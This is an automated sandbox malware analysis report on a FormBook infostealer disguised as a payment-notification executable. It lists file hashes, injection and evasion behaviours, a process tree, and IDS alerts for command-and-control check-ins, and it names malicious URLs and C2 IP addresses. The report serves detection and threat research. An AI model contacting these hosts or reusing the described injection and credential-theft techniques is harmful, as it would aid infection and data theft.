Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Overview

General Information

Sample name:Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Analysis ID:1589911
MD5:24516ed0bcff1bb18dd58da6b6919c3e
SHA1:760d5c65217102892caf3d6313ab3edc7a8548fa
SHA256:3bc8146fb4903843798975abff071ddbe0b44769e5f6f8ed4850c17daf5c71c8
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe" MD5: 24516ED0BCFF1BB18DD58DA6B6919C3E)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • vtTdsKSTqQr.exe (PID: 4948 cmdline: "C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • w32tm.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\w32tm.exe" MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
          • vtTdsKSTqQr.exe (PID: 2784 cmdline: "C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7976 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ParentProcessId: 7508, ParentProcessName: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ProcessId: 7524, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", CommandLine|base64offset|contains: 6b~'*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ParentImage: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ParentProcessId: 7508, ParentProcessName: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe", ProcessId: 7524, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T10:19:31.792823+010020507451Malware Command and Control Activity Detected192.168.2.449736199.59.243.22880TCP
                2025-01-13T10:20:03.318941+010020507451Malware Command and Control Activity Detected192.168.2.449832104.21.13.14180TCP
                2025-01-13T10:20:17.601041+010020507451Malware Command and Control Activity Detected192.168.2.44991615.197.240.2080TCP
                2025-01-13T10:20:31.291950+010020507451Malware Command and Control Activity Detected192.168.2.450010136.243.225.580TCP
                2025-01-13T10:20:44.644673+010020507451Malware Command and Control Activity Detected192.168.2.450020104.21.18.17180TCP
                2025-01-13T10:20:57.941444+010020507451Malware Command and Control Activity Detected192.168.2.450024199.192.21.16980TCP
                2025-01-13T10:21:11.478583+010020507451Malware Command and Control Activity Detected192.168.2.45002845.130.41.10780TCP
                2025-01-13T10:21:25.172684+010020507451Malware Command and Control Activity Detected192.168.2.45003285.159.66.9380TCP
                2025-01-13T10:21:38.712173+010020507451Malware Command and Control Activity Detected192.168.2.450036199.59.243.22880TCP
                2025-01-13T10:22:13.142898+010020507451Malware Command and Control Activity Detected192.168.2.45004038.22.89.16480TCP
                2025-01-13T10:22:27.222582+010020507451Malware Command and Control Activity Detected192.168.2.45004468.65.122.7180TCP
                2025-01-13T10:22:58.700369+010020507451Malware Command and Control Activity Detected192.168.2.450048103.174.136.13780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T10:19:31.792823+010028554651A Network Trojan was detected192.168.2.449736199.59.243.22880TCP
                2025-01-13T10:20:03.318941+010028554651A Network Trojan was detected192.168.2.449832104.21.13.14180TCP
                2025-01-13T10:20:17.601041+010028554651A Network Trojan was detected192.168.2.44991615.197.240.2080TCP
                2025-01-13T10:20:31.291950+010028554651A Network Trojan was detected192.168.2.450010136.243.225.580TCP
                2025-01-13T10:20:44.644673+010028554651A Network Trojan was detected192.168.2.450020104.21.18.17180TCP
                2025-01-13T10:20:57.941444+010028554651A Network Trojan was detected192.168.2.450024199.192.21.16980TCP
                2025-01-13T10:21:11.478583+010028554651A Network Trojan was detected192.168.2.45002845.130.41.10780TCP
                2025-01-13T10:21:25.172684+010028554651A Network Trojan was detected192.168.2.45003285.159.66.9380TCP
                2025-01-13T10:21:38.712173+010028554651A Network Trojan was detected192.168.2.450036199.59.243.22880TCP
                2025-01-13T10:22:13.142898+010028554651A Network Trojan was detected192.168.2.45004038.22.89.16480TCP
                2025-01-13T10:22:27.222582+010028554651A Network Trojan was detected192.168.2.45004468.65.122.7180TCP
                2025-01-13T10:22:58.700369+010028554651A Network Trojan was detected192.168.2.450048103.174.136.13780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T10:19:55.501146+010028554641A Network Trojan was detected192.168.2.449779104.21.13.14180TCP
                2025-01-13T10:19:58.027663+010028554641A Network Trojan was detected192.168.2.449795104.21.13.14180TCP
                2025-01-13T10:20:00.595689+010028554641A Network Trojan was detected192.168.2.449812104.21.13.14180TCP
                2025-01-13T10:20:10.033463+010028554641A Network Trojan was detected192.168.2.44986815.197.240.2080TCP
                2025-01-13T10:20:11.527719+010028554641A Network Trojan was detected192.168.2.44988415.197.240.2080TCP
                2025-01-13T10:20:15.114687+010028554641A Network Trojan was detected192.168.2.44989615.197.240.2080TCP
                2025-01-13T10:20:23.330918+010028554641A Network Trojan was detected192.168.2.449957136.243.225.580TCP
                2025-01-13T10:20:25.888137+010028554641A Network Trojan was detected192.168.2.449977136.243.225.580TCP
                2025-01-13T10:20:28.783179+010028554641A Network Trojan was detected192.168.2.449994136.243.225.580TCP
                2025-01-13T10:20:36.981692+010028554641A Network Trojan was detected192.168.2.450017104.21.18.17180TCP
                2025-01-13T10:20:39.553568+010028554641A Network Trojan was detected192.168.2.450018104.21.18.17180TCP
                2025-01-13T10:20:42.087545+010028554641A Network Trojan was detected192.168.2.450019104.21.18.17180TCP
                2025-01-13T10:20:50.329479+010028554641A Network Trojan was detected192.168.2.450021199.192.21.16980TCP
                2025-01-13T10:20:52.838344+010028554641A Network Trojan was detected192.168.2.450022199.192.21.16980TCP
                2025-01-13T10:20:55.455625+010028554641A Network Trojan was detected192.168.2.450023199.192.21.16980TCP
                2025-01-13T10:21:03.831033+010028554641A Network Trojan was detected192.168.2.45002545.130.41.10780TCP
                2025-01-13T10:21:06.369860+010028554641A Network Trojan was detected192.168.2.45002645.130.41.10780TCP
                2025-01-13T10:21:08.914520+010028554641A Network Trojan was detected192.168.2.45002745.130.41.10780TCP
                2025-01-13T10:21:18.348878+010028554641A Network Trojan was detected192.168.2.45002985.159.66.9380TCP
                2025-01-13T10:21:20.897525+010028554641A Network Trojan was detected192.168.2.45003085.159.66.9380TCP
                2025-01-13T10:21:23.458253+010028554641A Network Trojan was detected192.168.2.45003185.159.66.9380TCP
                2025-01-13T10:21:30.895681+010028554641A Network Trojan was detected192.168.2.450033199.59.243.22880TCP
                2025-01-13T10:21:33.452280+010028554641A Network Trojan was detected192.168.2.450034199.59.243.22880TCP
                2025-01-13T10:21:36.131921+010028554641A Network Trojan was detected192.168.2.450035199.59.243.22880TCP
                2025-01-13T10:21:45.554645+010028554641A Network Trojan was detected192.168.2.45003738.22.89.16480TCP
                2025-01-13T10:21:48.114873+010028554641A Network Trojan was detected192.168.2.45003838.22.89.16480TCP
                2025-01-13T10:21:50.739579+010028554641A Network Trojan was detected192.168.2.45003938.22.89.16480TCP
                2025-01-13T10:22:19.123445+010028554641A Network Trojan was detected192.168.2.45004168.65.122.7180TCP
                2025-01-13T10:22:21.584686+010028554641A Network Trojan was detected192.168.2.45004268.65.122.7180TCP
                2025-01-13T10:22:24.168711+010028554641A Network Trojan was detected192.168.2.45004368.65.122.7180TCP
                2025-01-13T10:22:51.061567+010028554641A Network Trojan was detected192.168.2.450045103.174.136.13780TCP
                2025-01-13T10:22:53.606826+010028554641A Network Trojan was detected192.168.2.450046103.174.136.13780TCP
                2025-01-13T10:22:56.176459+010028554641A Network Trojan was detected192.168.2.450047103.174.136.13780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeAvira: detected
                Source: http://www.811371bb10.buzz/ucix/Avira URL Cloud: Label: malware
                Source: http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3JAvira URL Cloud: Label: malware
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeReversingLabs: Detection: 76%
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeVirustotal: Detection: 36%Perma Link
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeJoe Sandbox ML: detected
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: w32tm.pdb source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vtTdsKSTqQr.exe, 00000002.00000002.4152048473.000000000083E000.00000002.00000001.01000000.00000004.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963095315.000000000083E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009568EE FindFirstFileW,FindClose,0_2_009568EE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0095698F
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D076
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D3A9
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00959642
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095979D
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094DBBE
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00955C97
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_00DECAA0 FindFirstFileW,FindNextFileW,FindClose,3_2_00DECAA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then xor eax, eax3_2_00DD9E50
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 4x nop then mov ebx, 00000004h3_2_036304D8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49795 -> 104.21.13.141:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 104.21.13.141:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49832 -> 104.21.13.141:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49832 -> 104.21.13.141:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49812 -> 104.21.13.141:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 15.197.240.20:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49916 -> 15.197.240.20:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49916 -> 15.197.240.20:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49868 -> 15.197.240.20:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49896 -> 15.197.240.20:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49977 -> 136.243.225.5:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 104.21.18.171:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 45.130.41.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 45.130.41.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 38.22.89.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 45.130.41.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 68.65.122.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50036 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49994 -> 136.243.225.5:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 38.22.89.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 68.65.122.71:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 38.22.89.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 45.130.41.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 68.65.122.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 103.174.136.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 104.21.18.171:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 104.21.18.171:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 38.22.89.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 45.130.41.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 38.22.89.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 68.65.122.71:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 68.65.122.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 103.174.136.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 136.243.225.5:80
